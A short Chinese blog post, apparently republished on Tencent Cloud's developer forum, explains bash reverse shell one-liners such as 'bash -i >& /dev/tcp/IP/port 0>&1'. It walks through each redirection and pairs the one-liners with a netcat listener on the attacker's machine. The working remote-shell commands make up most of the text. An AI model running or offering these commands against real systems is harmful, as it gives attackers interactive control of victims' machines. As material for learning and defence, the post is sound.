文章源自于个人博客:http://vfree.ltd
bash -i > /dev/tcp/ipaddr/port
bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的IP地址 2345:反弹到的端口
上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到
攻击机使用 nc -lvp 2200
监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令
bash -i >& /dev/tcp/127.0.0.1/2345 0>&1
这种就是交互式shell了
0:标准输入 1:标准输出 2:标准错误输出 &:是为了区分标准输出和文件描述符1
bash -i > /dev/tcp/127.0.0.1/2345 0>&1 2>&1
和上面的效果一样
bash -i >& /dev/tcp/127.0.0.1/2345 0>&1
值得一提的是,">&"相当于"2>&1",标准错误输出
一个标准的反弹shell语句种,最好是有标准输入输出和标准输出
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。